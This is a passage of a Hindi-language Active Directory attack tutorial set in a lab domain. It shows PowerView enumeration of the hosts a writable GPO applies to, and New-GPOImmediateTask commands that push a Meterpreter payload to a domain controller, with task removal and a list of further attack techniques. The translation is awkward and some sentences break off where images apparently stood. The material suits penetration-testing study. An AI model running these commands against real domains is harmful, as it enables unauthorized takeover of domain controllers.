एक Ragnar उपयोगकर्ता को एक GPO बदलने का अधिकार है जिसमें 6AC1786C-016F-11D2-945F-00C04FB984F9 का GUID है। यह निर्धारित करने के लिए कि डोमेन में कौन से होस्ट इस नीति को लागू करते हैं, निम्नलिखित कमांड चलाएँ

 Get-NetOU -GUID "6AC1786C-016F-11D2-945F-00C04FB984F9" | % {Get-NetComputer -AdSpath $_} 

मेजबान dc1.jet.lab मिला।

रगनार उपयोगकर्ता जिस विशिष्ट नीति को संपादित कर सकता है और जिस पर यह नीति लागू होती है, उसे जानने के बाद, हम dc1.jet.lab होस्ट पर विभिन्न कार्य कर सकते हैं।


उपकरण नई GPOImmediateTask और SharpGPOAbuse अनुमति देते हैं:

• कार्य शेड्यूलर में कार्य चलाएँ
• उपयोगकर्ता अधिकार (SeDebugPrivilege, SeTakeOwnershipPrivilege, आदि) जोड़ें
• स्टार्टअप के बाद चलने वाली स्क्रिप्ट जोड़ें
• उपयोगकर्ता को स्थानीय समूह में जोड़ें

उदाहरण के लिए, कार्य शेड्यूलर में एक कार्य को एक मीटरप्रेटर सत्र प्राप्त करने के लिए जोड़ें:

 New-GPOImmediateTask -TaskName test3 -GPODisplayName "Default Domain Controllers Policy" -CommandArguments '<powershell_meterepreter_payload>' -Force 

निष्पादन के बाद, शेड्यूल किया गया कार्य परीक्षण



और मीटरपरेटर सत्र प्रकट होता है।





किसी शेड्यूल किए गए कार्य को हटाने के लिए, आपको निम्न कमांड चलाने की आवश्यकता है:

 New-GPOImmediateTask -Remove -Force -GPODisplayName SecurePolicy 

निष्कर्ष

लेख में हमने केवल कुछ अटैक वैक्टर की जांच की। एन्युमरेट अकाउंट्स और पासवर्ड स्प्रे , MS14-068 , प्रिंटर बग का एक गुच्छा और असंबद्ध प्रतिनिधिमंडल जैसे दृश्य , एक्सचेंज ( शासक , PrivExchange , ExchangeRelayX ) पर हमले काफी हमले के दायरे का विस्तार कर सकते हैं।

हमले की तकनीक और पिनिंग के तरीके (गोल्डन टिकट, सिल्वर टिकट, पास-द-हैश, ओवर पास, हैश, एसआईडी हिस्ट्री, डीसी शैडो, आदि) लगातार बदल रहे हैं, और रक्षा टीम को हमेशा नए प्रकार के हमलों के लिए तैयार रहना चाहिए।